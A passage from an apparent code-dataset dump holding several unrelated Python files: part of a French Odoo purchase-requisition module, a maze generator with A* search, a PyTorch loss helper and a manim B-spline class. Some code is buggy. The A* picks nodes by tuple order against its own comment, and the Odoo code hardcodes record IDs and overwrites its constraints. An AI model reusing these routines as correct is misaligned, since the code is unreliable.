    \", \"Demande d'achat\", demande.id, demande.user_id.id, demande, context)\n self.write(cr,uid,ids,{'state':'done'})\n \n return True\n \n \n def action_bon_sortie(self,cr,uid,ids,context=None):\n sortie_obj = self.pool.get('purchase.exp.sortie')\n det_sortie_obj = self.pool.get('purchase.exp.sortie.detail')\n bon_livr_obj = self.pool.get('stock.picking')\n move_obj = self.pool.get('stock.move')\n \n for dmde in self.browse(cr,uid,ids):\n \n sortie = {\n 'name':self.pool.get('ir.sequence').get(cr, uid, 'purchase.exp.sortie'),\n 'datetime':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'achat_id':dmde.id,\n 'receveur_id':dmde.demandeur_id.id,\n } \n id = sortie_obj.create(cr, uid, sortie, context=context)\n \n #try :\n address_id = self.pool.get('res.partner').search(cr,uid,[('id','=',dmde.demandeur_id.id)])[0]\n reference = self.pool.get('ir.sequence').get(cr, uid, 'stock.picking.out')\n livraison = {\n 'name': reference,\n 'origin': dmde.name,\n 'achat_id':dmde.id,\n 'min_date':dmde.date_prevue,\n 'max_date':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'address_id':address_id,\n 'date':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'date_done':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'stock_journal_id':1,\n 'type': 'out',\n 'move_type':'one',\n 'state':'draft'\n }\n \n livr_id = bon_livr_obj.create(cr, uid, livraison, context=context)\n \n for det_dmde in dmde.line_det_ids :\n \n det_sortie = {\n 'name':det_dmde.name,\n 'product_id':det_dmde.product_id.id,\n 'quantite':det_dmde.product_qty,\n 'qte_dispo':det_dmde.product_id.qty_available,\n 'besoin_id':dmde.demande_id.id,\n 'sortie_id':id\n }\n \n move_line = {\n 'name': 'BSLine - %s' % (det_dmde.product_id.name),\n 'priority':'1',\n #'create_date':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'date':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'date_expected':time.strftime('%Y-%m-%d %H:%M:%S'),\n 'product_id':det_dmde.product_id.id,\n 'product_qty':det_dmde.product_qty,\n 'product_uos_qty':det_dmde.product_qty,\n 'product_uom':self.pool.get('product.uom').search(cr,uid,[('id','=',det_dmde.product_id.uom_id.id)])[0],\n 'product_uos':self.pool.get('product.uom').search(cr,uid,[('id','=',det_dmde.product_id.uom_id.id)])[0],\n 'price_unit':det_dmde.price_unit,\n 'location_id':self.pool.get('stock.location').search(cr,uid,[('name','=','Stock')])[0],\n 'location_dest_id':self.pool.get('stock.location').search(cr,uid,[('name','=','Output')])[0],\n 'address_id':self.pool.get('res.partner').search(cr,uid,[('id','=',dmde.demandeur_id.id)])[0],\n 'picking_id':livr_id,\n 'state':'draft',\n }\n \n det_sortie_obj.create(cr, uid, det_sortie, context=context)\n move_obj.create(cr, uid, move_line, context=context)\n \"\"\"except :\n address_id = False\"\"\"\n \n for demande in self.browse(cr,uid,ids):\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"

    Emission de bon pour sortie

    \", \"Bon pour sortie\", demande.id, demande.user_id.id, demande, context)\n \n besoin_obj = self.pool.get('purchase.exp.besoin')\n message = \"\"\"Bonjour M/Mme\\n\\nVeuillez trouver le bon pour sortie relatif à votre demande d'achat ci-dessous.\\n\\nCordialement \\n\\n\"\"\"\n emetteur = self._user_mail_get(cr,uid,ids,context)\n destinataire = besoin_obj._company_param_get(cr, uid, ids, 'mail_sce_achat', context)\n self.notif_mail(cr, uid, ids, emetteur, destinataire, \"Bon pour sortie : Transmis par le responsable des achats\", message, demande)\n \n return self.write(cr,uid,ids,{'state':'bon'})\n \n \n def print_requisition(self, cr, uid, ids, context=None):\n #assert len(ids) == 1, 'This option should only be used for a single id at a time'\n datas = self.read(cr, uid, [105], context=context)\n if datas :\n data = datas[0]\n \n self.write(cr,uid,ids,data,context)\n datas = {\n 'ids': ids,\n 'model': 'purchase.exp.achat',\n 'form': data\n }\n\n return {\n 'type': 'ir.actions.report.xml',\n 'report_name': 'da.report',\n 'datas': datas,\n 'nodestroy':True\n }\n \n _defaults={\n 'user_id':_user_get,\n 'date':time.strftime('%Y-%m-%d'),\n #'state':'draft', \n #'alerte_mail':True,\n 'notes': \"La présente demande s'inscrit dans le cadre de...\",\n 'location_dest_id':lambda obj, cr, uid, context: obj.pool.get('stock.location').search(cr, uid, [('name', '=', 'Output')], context=context)[0],\n }\n \n \ndemande_achat()\n\n\nclass detail_demande_achat(models.Model):\n _name=\"purchase.exp.achat.detail\"\n _description=\"Détail demande d'achat\"\n\n \n def _get_quantite(self,cr,uid,ids,field,arg,context=None):\n res={}\n var_tmp_ids=self.browse(cr,uid,ids,context)\n for s in var_tmp_ids:\n res[s.id]=s.product_id.qty_available\n return res\n\n \n def _get_quantite_cmde(self,cr,uid,ids,field,arg,context=None):\n res={}\n cr.execute(\"SELECT sum(product_qty),product_id,state FROM purchase_order_line WHERE state='confirmed' GROUP BY product_id,state\")\n produits = cr.fetchall()\n\n for det in self.browse(cr,uid,ids,context):\n qte = 0\n for prod in produits:\n if det.product_id.id==prod[1] :\n qte=prod[0]\n res[det.id]=qte\n return res\n \n \n def quantite_livree(self,cr,uid,ids,field,arg,context=None):\n res={}\n \n cr.execute(\"\"\"SELECT SUM(ds.quantite),ds.product_id,a.id FROM purchase_exp_sortie AS s,purchase_exp_sortie_detail AS ds, purchase_exp_achat a,purchase_exp_besoin b WHERE a.id=s.achat_id AND s.id=ds.sortie_id AND a.demande_id=b.id GROUP BY ds.product_id,a.id\"\"\")\n produits = cr.fetchall()\n \n for detail in self.browse(cr,uid,ids):\n qte = 0\n for prod in produits:\n if detail :\n if detail.demande_id.id==prod[2] :\n if detail.product_id.id==prod[1] :\n qte=prod[0]\n res[detail.id]=qte\n\n return res\n \n \n def _check_qte_livree(self,cr,uid,ids,context=None):\n res={}\n for s in self.browse(cr,uid,ids) :\n if s.product_qty < s.gave_qty :\n return False\n return True\n \n \n def _check_qte_null(self,cr,uid,ids,context=None):\n res={}\n for s in self.browse(cr,uid,ids) :\n if s.product_qty ==0 :\n return False\n return True\n\n def _get_sub_total(self,cr,uid,ids,field,arg,context=None):\n res={}\n remise = 0.00\n subtotal = 0.00\n taxe = 0.00\n for i in self.browse(cr, uid, ids, context):\n if i.taxe_id :\n taxe = i.taxe_id.amount\n remise = i.discount\n subtotal= i.price_unit * (1 - remise/100) * i.product_qty\n res[i.id]=subtotal\n return res\n \n \n \n _columns={\n 'name': fields.char('Désignation', size=256, required=True),\n 'product_qty': fields.float('Qté dmdée', required=True),\n 'available_qty':fields.function(_get_quantite,\n method=True,\n type='float',\n string='Qté dispo.', help='Quantité réelle du produit disponible en stock'),\n 'ordered_qty':fields.function(_get_quantite_cmde,\n method=True,\n type='float', string='Qté cmdée.', help='Quantité commandée du produit demandé'),\n 'gave_qty':fields.function(quantite_livree,\n method=True,\n type='float',\n string='Qté livrée', help='Quantité livrée du produit demandé'),\n 'date_planned': fields.date('Date', required=True, select=True),\n 'product_uom': fields.many2one('product.uom', 'Product UOM', required=True, help='Unité de mesure du produit'),\n 'product_id': fields.many2one('product.product', 'Product', domain=[('purchase_ok','=',True)], change_default=True),\n 'price_unit': fields.float('Prix unitaire', required=True),\n 'taxe_id':fields.many2one('account.tax','Taxe', domain=[('type_tax_use','in',('purchase','all'))]),\n 'partner_id':fields.many2one('res.partner', 'Fournisseur potentiel', required=False, domain=[('supplier','=',True)], help='Fournisseur potentiel de la demande'),\n 'notes': fields.text('Notes'),\n 'demande_id':fields.many2one('purchase.exp.achat', 'Demande', required=False, ondelete='cascade'),\n 'discount':fields.float('Remise (%)'),\n\t\t 'subtotal':fields.function(_get_sub_total,method=True,type='float',string=\"Sous-Total\"),\n }\n \n _defaults={\n 'product_qty':1\n }\n _constraints=[(_check_qte_livree,\"La quantité de produit à livrer ne peut être supérieure à la quantité initiale demandée\",['product_qty'])]\n _constraints=[(_check_qte_null,\"Les quantités nulles ne sont pas admises\",['product_qty'])]\n\ndetail_demande_achat()\n\n\nclass bon_sortie(models.Model):\n _name=\"purchase.exp.sortie\"\n _description=\"Bon de sortie\"\n _order = 'name desc'\n \n def _receveur_get(self, cr, uid,ids, context=None):\n res={}\n for s in self.browse(cr,uid,ids) :\n id_ach = 6\n \n cr.execute(\"\"\"SELECT demandeur_id FROM purchase_exp_achat WHERE id=%s\"\"\",str(id_ach))\n demandeur = cr.fetchall()\n for s in self.browse(cr,uid,ids) :\n for d in demandeur :\n res[s.id]=d[0]\n return res\n\n \n def _check_state(self,cr,uid,ids,context=None):\n for s in self.browse(cr,uid,ids) :\n if s.achat_id.state == \"confirmed\" :\n return False\n return True\n \n \n def _check_produits(self,cr,uid,ids,context=None):\n res={}\n for s in self.browse(cr,uid,ids) :\n id_achat = s.achat_id.id\n\n cr.execute(\"\"\"SELECT product_id,b.id FROM purchase_exp_achat_detail AS pd, purchase_exp_achat AS pa,purchase_exp_besoin b WHERE pa.id=pd.demande_id AND pa.demande_id=b.id\"\"\")\n prod = cr.fetchall()\n \n for bon in self.browse(cr,uid,ids) :\n if bon.achat_id.id == id_achat :\n for d in bon.det_sortie_ids :\n cpt=0\n for p in prod :\n if d.product_id.id == p[0] :\n cpt+=1 \n if cpt == 0 :\n return False\n if bon.achat_id.state != \"confirmed\" and bon.achat_id.state != \"cotation\" :\n return False\n \n return True \n \n \n def get_inputs(self, cr, uid,ids, context=None):\n res=[]\n for bon in self.browse(cr,uid,ids) :\n inputs = {\n 'product_id':1,\n 'quantite':1,\n }\n res += [inputs]\n return res\n \n \n def onchange_achat_id(self, cr, uid, ids, achat_id):\n if not achat_id:\n return {}\n ach = self.pool.get('purchase.exp.achat').browse(cr, uid, achat_id)\n input_line_ids = self.get_inputs(cr, uid,ids)\n return {'value': { \n 'receveur_id': ach.demandeur_id.id,\n 'det_sortie_ids':input_line_ids\n },\n }\n\n \n _columns={\n 'name':fields.char('Référence', size=64, required=True, readonly=False),\n 'datetime': fields.datetime('Date',required=True),\n 'achat_id':fields.many2one('purchase.exp.achat', \"Demande d'achat\", required=True, ondelete='cascade'),\n 'receveur_id':fields.many2one('hr.employee', 'Destinataire', required=False),\n 'det_sortie_ids':fields.one2many('purchase.exp.sortie.detail', 'sortie_id', 'Détail bon de sortie', required=False),\n 'notes':fields.text('Notes')\n }\n \n _defaults={\n 'name':lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'purchase.exp.sortie'),\n 'datetime':time.strftime('%Y-%m-%d %H:%M:%S'),\n }\n \n #_constraints=[(_check_produits,\"Veuillez selectionnez des produits de la demande d'achat confirmée pour la saisie du bon de sortie\",['achat_id'])]\n _sql_constraints = [\n ('name_uniq', 'unique(name)', 'La reférence doit être unique !'),\n ]\nbon_sortie()\n\n\nclass bon_sortie_detail(models.Model):\n _name=\"purchase.exp.sortie.detail\"\n _description=\"Détail bon de sortie\"\n \n \n def onchange_product_id(self, cr, uid, ids, product_id):\n if not product_id:\n return {}\n pro = self.pool.get('product.product').browse(cr, uid, product_id)\n return {'value': { 'qte_dispo': pro.qty_available, \n },\n }\n \n \n def _check_qte_produits(self,cr,uid,ids,context=None):\n res={}\n for s in self.browse(cr,uid,ids) :\n if s.quantite > s.qte_dispo or s.quantite == 0 or s.qte_dispo == 0:\n return False\n return True\n \n _columns={\n 'name':fields.char('Reference', size=128, required=False),\n 'product_id':fields.many2one('product.product', 'Désignation', required=True),\n 'quantite':fields.integer('Quantité', required=True),\n 'qte_dispo':fields.integer('Qté dispo', required=True),\n 'besoin_id':fields.many2one('purchase.exp.besoin', 'Besoin', required=False, ondelete='cascade'),\n 'sortie_id':fields.many2one('purchase.exp.sortie', 'Demande', required=False, ondelete='cascade'),\n }\n _defaults={\n 'quantite':1,\n }\n _constraints=[(_check_qte_produits,\"Vous ne pouvez générer de bon de sortie pour des produits en quantité insuffisante ou nulle\",['product_id'])]\nbon_sortie_detail()\n\n\nclass cotation_groupee(models.Model):\n _name=\"purchase.exp.cotation.groupee\"\n _description=\"Demande de cotations groupées\"\n _order = \"id desc\"\n \n \n def _employee_get(self, cr, uid, context=None):\n ids = self.pool.get('hr.employee').search(cr, uid, [('user_id', '=', uid)], context=context)\n if ids:\n return ids[0]\n return False\n \n \n _columns={\n 'name':fields.char('Libellé', size=128, required=True, readonly=False,states={'done':[('readonly',True)]}),\n 'date':fields.date('Date', required=True,states={'done':[('readonly',True)]}),\n 'pricelist_id':fields.many2one('product.pricelist', 'Liste de prix', required=True,states={'done':[('readonly',True)]}),\n 'location_id':fields.many2one('stock.location', 'Emplacement', required=True,states={'done':[('readonly',True)]}),\n 'employee_id':fields.many2one('hr.employee', 'Employé', required=False),\n 'template_mail_id':fields.many2one('purchase.exp.achat.template.mail','Template mail achat', required=False),\n 'appel_offre':fields.boolean(\"Appel d'offre\", help=\"Si coché, permet de générer automatiquement un appel d'offre qui contiendra toutes les cotations groupées\",states={'done':[('readonly',True)]}),\n 'alerte_mail':fields.boolean(\"Envoi de mail\", help=\"Si coché, permet d'envoyer automatiquement des e-mails aux fournisseurs séléctionnés\",states={'done':[('readonly',True)]}),\n 'note':fields.text('Notes',states={'done':[('readonly',True)]}),\n 'cotation_ids':fields.many2many('purchase.exp.achat', 'cotation_achat_rel', 'cotation_id', 'achat_id', \"Demandes d'achat\", domain=[('state','in',('cotation','confirmed'))],states={'done':[('readonly',True)]}),\n 'fournisseur_ids':fields.many2many('res.partner', 'partner_quotation_rel', 'cotation_id', 'partner_id', 'Autres Fournisseurs', domain=[('supplier','=','True')], help=\"L'on donne la possibilité à l'utilisateur de choisir d'autres fournisseur pour les demande de cotation hors mis ceux ceux choisi dans les expressions de besoins\"),\n 'state':fields.selection([('draft','Brouillon'),\n ('confirmed','Confirmé'),\n ('done','Clôturé')],'Statut',readonly=True,required=True,states={'done':[('readonly',True)]}\n )\n }\n\n \n def _template_mail_get(self, cr, uid,ids, context=None):\n ids = self.pool.get('purchase.exp.achat.template.mail').search(cr, uid, [('name', '=', 'cotation')], context=context)\n if ids:\n return ids[0]\n return False\n \n def action_draft(self,cr,uid,ids,context=None):\n return self.write(cr,uid,ids,{'state':'draft'})\n \n def action_confirm(self,cr,uid,ids,context=None):\n return self.write(cr,uid,ids,{'state':'confirmed'})\n \n def action_done(self,cr,uid,ids,context=None):\n \n #obj_cotation = self.browse(cr,uid,ids,context)\n obj_purchase_order = self.pool.get('purchase.order')\n obj_purchase_order_line = self.pool.get('purchase.order.line')\n #obj_bon = self.pool.get('purchase.exp.sortie')\n obj_offre = self.pool.get('purchase.requisition')\n obj_offre_line = self.pool.get('purchase.requisition.line')\n purchase_id = False\n \n cr.execute(\"\"\"SELECT product_id,sum(product_qty),c.id,product_uom,price_unit,pdt.default_code,pdt.name_template,partner_id\n FROM purchase_exp_achat_detail p, purchase_exp_cotation_groupee c, cotation_achat_rel car,product_product pdt\n WHERE p.demande_id=car.achat_id\n AND c.id=car.cotation_id\n AND pdt.id=p.product_id\n GROUP BY product_id,c.id,product_uom,price_unit,pdt.default_code,pdt.name_template,partner_id\"\"\")\n produits = cr.fetchall()\n \n \n four = {}\n for cotation in self.browse(cr,uid,ids,context):\n #test = _unique(cotation.cotation_ids)\n \n def unique():\n found = set([])\n keep = []\n \n for dmde_achat in cotation.cotation_ids :\n for det_achat in dmde_achat.line_det_ids :\n if det_achat.partner_id.id not in found :\n found.add(det_achat.partner_id.id)\n keep.append(det_achat.partner_id.id)\n \n \"\"\"for autre_fournisseur in cotation.fournisseur_ids :\n if autre_fournisseur.id not in found :\n found.add(autre_fournisseur.id)\n keep.append(autre_fournisseur.id)\"\"\"\n \n return keep\n \n \n def unique_produits():\n found = set([])\n keep = []\n \n for dmde_achat in cotation.cotation_ids :\n for det_achat in dmde_achat.line_det_ids :\n if det_achat.product_id not in found:\n found.add(det_achat.product_id)\n keep.append(det_achat.product_id)\n \n return keep\n \n \n id_offre = 0\n if cotation.appel_offre :\n offre = {\n 'date_start': time.strftime('%Y-%m-%d %H:%M:%S'),\n 'state': 'draft',\n 'exclusive': 'multiple',\n 'company_id': self.pool.get('res.company')._company_default_get(cr, uid, 'purchase.requisition', context=context),\n 'user_id': uid,\n 'name': self.pool.get('ir.sequence').get(cr, uid, 'purchase.order.requisition'),\n }\n id_offre = obj_offre.create(cr, uid, offre, context=context)\n \n #try : \n \n four = unique()\n \n for frs in four:\n reference = self.pool.get('ir.sequence').get(cr, uid, 'purchase.order')\n #partner_id = self.pool.get('res.partner').search(cr,uid,[('partner_id','=',frs)])[0]\n order_data = {\n 'name': reference,\n 'date_order': time.strftime('%Y-%m-%d'),\n 'state': 'draft',\n 'partner_id': frs,\n #'partner_address_id': partner_id,\n 'pricelist_id': cotation.pricelist_id.id,\n 'location_id':cotation.location_id.id,\n 'invoice_method':'order',\n 'requisition_id':id_offre,\n }\n purchase_id = obj_purchase_order.create(cr, uid, order_data, context=context)\n #raise osv.except_osv('Warning test', purchase_id) \n line = \"\"\n for pdt in produits :\n if pdt[2]==cotation.id and pdt[7]==frs:\n cr.execute(\"\"\"SELECT product_id,sum(product_qty),c.id\n FROM purchase_exp_achat_detail p, purchase_exp_cotation_groupee c, cotation_achat_rel car,product_product pdt\n WHERE p.demande_id=car.achat_id\n AND c.id=car.cotation_id\n AND pdt.id=p.product_id\n AND p.product_id=%s\n AND c.id=%s\n GROUP BY product_id,c.id\"\"\",(pdt[0],cotation.id))\n quantite=cr.fetchall()\n qty=0\n for qte in quantite :\n qty=qte[1]\n line_data = {\n 'product_id': pdt[0],\n 'product_qty': qty,\n 'product_uom': pdt[3],\n 'name': pdt[6],\n 'date_planned': time.strftime('%Y-%m-%d'),\n 'price_unit': pdt[4],\n 'order_id': purchase_id,\n }\n line = line + str(pdt[5]) + ' ' + str(pdt[6]) + \"\\n\"\n obj_purchase_order_line.create(cr, uid, line_data, context=context)\n \n #Création des produits de l'appel d'offre\n found = set([])\n keep = []\n if pdt[0] not in found:\n \n cr.execute('select uom_id from product_product p, product_template t where p.product_tmpl_id=t.id and p.id=%s',(pdt[0],))\n uom_id = cr.fetchone()[0]\n cr.execute('select company_id from product_product p, product_template t where p.product_tmpl_id=t.id and p.id=%s',(pdt[0],))\n company_id = cr.fetchone()[0]\n \n produits_offre = {\n 'product_id': pdt[0],\n 'product_uom_id': uom_id,\n 'product_qty': qty,\n 'requisition_id' : id_offre,\n 'company_id': company_id,\n }\n obj_offre_line.create(cr, uid, produits_offre, context=context)\n found.add(pdt[0])\n #keep.append(pdt[0])\n \n cr.execute(\"\"\"SELECT COUNT(*) AS nbr_doublon,product_id\n FROM purchase_requisition_line\n WHERE requisition_id=%s\n GROUP BY product_id\n HAVING COUNT(*) > 1\"\"\",(id_offre,))\n \n #Send mail sans queue\n if cotation.alerte_mail :\n #Vérification de possession d'adresse mail des fournisseurs\n for cot in cotation.cotation_ids :\n for cota in cot.line_det_ids :\n if not cota.partner_id.email :\n raise osv.except_osv('Error','Assurez-vous que chaque fournisseur possède une adresse mail')\n \n cr.execute('select email from res_partner where id=%s',(frs,))\n email = cr.fetchone()[0]\n if cotation.template_mail_id.active :\n ir_mail_server = self.pool.get('ir.mail_server')\n msg = ir_mail_server.build_email(cotation.employee_id.work_email, [email], \"Demande de cotation \" + reference, cotation.template_mail_id.mail + \"\\n\\n\" + line)\n ir_mail_server.send_email(cr, uid, msg)\n #except :\n # partner_id = ''\n \n for c in cotation.cotation_ids :\n cr.execute(\"\"\"UPDATE purchase_exp_achat SET state = %s WHERE state = %s AND id = %s\"\"\",('cotation','confirmed',str(c.id)))\n \n \n return self.write(cr,uid,ids,{'state':'done'})\n \n _defaults={\n 'employee_id': _employee_get,\n 'template_mail_id':_template_mail_get,\n 'state':'draft',\n 'name':'Cotation groupée du %s' % time.strftime('%d/%m/%Y %H:%M:%S'),\n 'date':time.strftime('%Y-%m-%d'),\n 'pricelist_id':lambda obj, cr, uid, context: obj.pool.get('product.pricelist').search(cr, uid, [('type', '=', 'purchase')], context=context)[0],\n 'location_id':lambda obj, cr, uid, context: obj.pool.get('stock.location').search(cr, uid, [('name', '=', 'Stock')], context=context)[0],\n\n }\n \ncotation_groupee()\n\nclass purchase_order(models.Model):\n _inherit = \"purchase.order\"\n _name = \"purchase.order\"\n \n _columns={\n 'achat_id':fields.many2one('purchase.exp.achat', \"Demande d'achat\", required=False),\n 'besoin_id':fields.many2one('purchase.exp.besoin', \"Expression de besoin\", required=False),\n }\npurchase_order()\n\n\nclass product_product(models.Model):\n _inherit = \"product.product\"\n _name = \"product.product\"\n \n _columns={\n 'achat_id':fields.many2one('purchase.exp.achat', \"Demande d'achat\", required=False),\n }\n \nproduct_product()\n\nclass stock_picking(models.Model):\n _inherit = \"stock.picking\"\n _name = \"stock.picking\"\n \n _columns={\n 'achat_id':fields.many2one('purchase.exp.achat', \"Demande d'achat\", required=False),\n }\n \nstock_picking()\n\nclass product_category_temp(models.Model):\n _name = \"product.category.temp\"\n \n _columns={\n 'catogory_id':fields.many2one('product.category', \"Category\", required=False),\n }\n \nproduct_category_temp()\n\n\nclass commentaire(models.Model):\n _name=\"purchase.exp.commentaire\"\n _description=\"Commentaires des expressions de besoin\"\n \n \n _columns={\n 'name':fields.char('Name', size=64, required=False, readonly=False),\n 'user_id':fields.many2one('res.users', 'Utilisateur', required=False, readonly=True),\n 'date': fields.datetime('Date'),\n 'commentaire':fields.text('Commentaire', required=True),\n 'besoin_id':fields.many2one('purchase.exp.besoin', 'Besoin', required=False),\n 'order_id':fields.many2one('purchase.exp.achat', 'Ordre achat', required=False),\n }\n \n \n def unlink(self, cr, uid, ids, context=None):\n for comment in self.browse(cr,uid,ids) :\n if comment.user_id.id != uid :\n raise osv.except_osv('Erreur', \"Vous ne pouvez supprimer le commentaire d'un autre utilisateur !\")\n \n return models.Model.unlink(self, cr, uid, ids, context=context)\n\n \n def _user_get(self, cr, uid, context=None):\n ids = self.pool.get('res.users').search(cr, uid, [('id', '=', uid)], context=context)\n if ids:\n return ids[0]\n return False\n \n \n \n _defaults={\n 'user_id':_user_get,\n 'date': lambda *a: str(datetime.now())\n }\ncommentaire()\n\n\nclass sale_order(models.Model):\n _inherit='sale.order'\n \n _columns={\n 'delai_livraison':fields.date('Delai de livraison'),\n 'da_ids':fields.one2many('purchase.exp.achat', 'sale_id', \"Demande d'achat\"),\n }\nsale_order()\n\n","repo_name":"lekaizen210/addons_talentys","sub_path":"talentys_custom/models/requisition_old.py","file_name":"requisition_old.py","file_ext":"py","file_size_in_byte":52796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39518330772","text":"from numpy.random import random_integers as rnd\nimport numpy as np\n\n\ndef maze(width=70, height=70, complexity=1, density=1):\n # Only odd shapes\n shape = ((height // 2) * 2 + 1, (width // 2) * 2 + 1)\n # Adjust complexity and density relative to maze size\n complexity = int(complexity * (5 * (shape[0] + shape[1])))\n density = int(density * (shape[0] // 2 * shape[1] // 2))\n # Build actual maze\n Z = np.zeros(shape, dtype=np.int8)\n # Fill borders\n Z[0, :] = Z[-1, :] = 2\n Z[:, 0] = Z[:, -1] = 2\n # Make isles\n for i in range(density):\n x, y = rnd(0, shape[1] // 2) * 2, rnd(0, shape[0] // 2) * 2\n Z[y, x] = 2\n for j in range(complexity):\n neighbours = []\n if x > 1:\n neighbours.append((y, x - 2))\n if x < shape[1] - 2:\n neighbours.append((y, x + 2))\n if y > 1:\n neighbours.append((y - 2, x))\n if y < shape[0] - 2:\n neighbours.append((y + 2, x))\n if len(neighbours):\n y_, x_ = neighbours[rnd(0, len(neighbours) - 1)]\n if Z[y_, x_] == 0:\n Z[y_, x_] = 2\n Z[y_ + (y - y_) // 2, x_ + (x - x_) // 2] = 2\n x, y = x_, y_\n return Z\n\n\ndef a_star(start, goal, gen_maze):\n # The set of nodes already evaluated\n closedSet = []\n\n # The set of currently discovered nodes that are not evaluated yet.\n # Initially, only the start node is known.\n openSet = [start]\n\n # For each node, which node it can most efficiently be reached from.\n # If a node can be reached from many nodes, cameFrom will eventually contain the\n # most efficient previous step.\n # cameFrom = np.zeros(gen_maze.shape(), dtype=np.int8) # an empty map\n cameFrom = {}\n\n # For each node, the total cost of getting from the start node to the goal\n # by passing by that node. That value is partly known, partly heuristic.\n fScore = np.ones(gen_maze.shape) # map with default value of Infinity\n\n # For the first node, that value is completely heuristic.\n fScore[start] = heuristic(start, goal)\n\n while openSet:\n current = min(openSet) # the node in openSet having the lowest fScore[] value\n neighbors = neigh(current, gen_maze, len(gen_maze), len(gen_maze[0]))\n if current == goal:\n return reconstruct_path(cameFrom, current)\n\n openSet.remove(current)\n closedSet.append(current)\n\n # print(neighbors)\n for neighbor in neighbors:\n if neighbor in closedSet:\n continue # Ignore the neighbor which is already evaluated.\n\n if neighbor not in openSet:\t# Discover a new node\n openSet.append(neighbor)\n\n # This path is the best until now. Record it!\n cameFrom[neighbor] = current\n fScore[neighbor] = heuristic(neighbor, goal)\n\n\ndef reconstruct_path(cameFrom, current):\n total_path = [current]\n while current in cameFrom:\n current = cameFrom[current]\n total_path.append(current)\n total_path.reverse()\n return total_path\n\n\n# manhattan distance\ndef heuristic(s, d):\n sx, sy = s\n dx, dy = d\n return abs(dx - sx) + abs(dy - sy)\n\n\ndef neigh(v, m, row, col):\n n = []\n if v[0] > 0:\n node = (v[0] - 1, v[1])\n if m[v[0] - 1][v[1]] != 2:\n n.append(node)\n if v[1] > 0:\n node = (v[0], v[1] - 1)\n if m[v[0]][v[1] - 1] != 2:\n n.append(node)\n if v[0] < row - 1:\n node = (v[0] + 1, v[1])\n if m[v[0] + 1][v[1]] != 2:\n n.append(node)\n if v[1] < col - 1:\n node = (v[0], v[1] + 1)\n if m[v[0]][v[1] + 1] != 2:\n n.append(node)\n return n\n\n\nsprite_positions = [\n [69.5, 69.5, 3], # AI must be mutable\n\n # (20.5, 11.5, 2), # green light in front of playerstart\n # green lights in every room\n # (18.5, 4.5, 2),\n # (10.0, 4.5, 2),\n # (10.0, 12.5, 2),\n # (3.5, 6.5, 2),\n # (3.5, 20.5, 2),\n # (3.5, 14.5, 2),\n # (14.5, 20.5, 2),\n (1.5, 1.5, 2),\n (1.5, 69.5, 2),\n (69.5, 1.5, 2),\n (69.5, 69.5, 2),\n\n # row of pillars in front of wall: fisheye test\n # (18.5, 10.5, 1),\n # (18.5, 11.5, 1),\n # (18.5, 12.5, 1),\n\n # some barrels around the map\n # (21.5, 1.5, 0),\n (15.5, 1.5, 0),\n (16.0, 1.8, 0),\n (16.2, 1.2, 0),\n # (3.5, 2.5, 0),\n # (9.5, 15.5, 0),\n # (10.0, 15.1, 0),\n # (10.5, 15.8, 0)\n]\n\nsprite_zero = []\n\nplayer_start = [\n (1.5, 1.5, -1, 0, 0, .66)\n #(1.5, 1.5, 1, -1, 0, .66)\n #(27, 11.5, -1, 0, 0, .66)\n]","repo_name":"scrufulufugus/TWAIn","sub_path":"src/maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24844127739","text":"import torch\nimport torch.nn.functional as F \n\n@torch.no_grad()\ndef helper_eval_gpt_ce_losses(model, get_batch, n_class, eval_iter, batch_args):\n out = {}\n for stage in ['train', 'eval']:\n losses = torch.zeros(eval_iter)\n for k in range(eval_iter):\n xb, yb = get_batch(stage=stage, **batch_args)\n \n logits = model(xb)\n mini_batch_loss = F.cross_entropy(input=logits.view(-1, n_class), target=yb.view(-1))\n \n losses[k] = mini_batch_loss.item()\n out[stage] = losses.mean()\n return out","repo_name":"MMoshtaghi/DeepLearning-from-zero-to-GPT-from-scratch-exlpained","sub_path":"helper_eval.py","file_name":"helper_eval.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9737373047","text":"from manim import *\nimport numpy as np\nimport deepdish as dd\n\n\nclass BasisSpline(object):\n def __init__(\n self,\n n_df,\n xrange=(0, 1),\n k=4,\n knots=None,\n normalize=True,\n ):\n self.order = k\n self.N = n_df\n self.xrange = xrange\n if knots is None:\n interior_knots = np.linspace(*xrange, n_df - k + 2)\n dx = interior_knots[1] - interior_knots[0]\n knots = np.concatenate(\n [\n xrange[0] - dx * np.arange(1, k)[::-1],\n interior_knots,\n xrange[1] + dx * np.arange(1, k),\n ]\n )\n self.knots = knots\n self.interior_knots = knots\n assert len(self.knots) == self.N + self.order\n\n self.normalize = normalize\n self.basis_vols = np.ones(self.N)\n if normalize:\n grid = np.linspace(*xrange, 1000)\n grid_bases = np.array(self.bases(grid))\n self.basis_vols = np.array(\n [np.trapz(grid_bases[i, :], grid) for i in range(self.N)]\n )\n\n def norm(self, coefs):\n n = 1.0 / np.sum(self.basis_vols * coefs.flatten()) if self.normalize else 1.0\n return n\n\n def _basis(self, xs, i, k):\n if self.knots[i + k] - self.knots[i] < 1e-6:\n return np.zeros_like(xs)\n elif k == 1:\n v = np.zeros_like(xs)\n v[(xs >= self.knots[i]) & (xs < self.knots[i + 1])] = 1 / (\n self.knots[i + 1] - self.knots[i]\n )\n return v\n else:\n v = (xs - self.knots[i]) * self._basis(xs, i, k - 1) + (\n self.knots[i + k] - xs\n ) * self._basis(xs, i + 1, k - 1)\n return (v * k) / ((k - 1) * (self.knots[i + k] - self.knots[i]))\n\n def _bases(self, xs):\n return [self._basis(xs, i, k=self.order) for i in range(self.N)]\n\n def bases(self, xs):\n return np.concatenate(self._bases(xs)).reshape(self.N, *xs.shape)\n\n def project(self, bases, shape, coefs):\n coefs = coefs.reshape(shape)\n coefs /= np.sum(coefs)\n return np.sum(coefs * bases, axis=0) * self.norm(coefs)\n\n def eval(self, 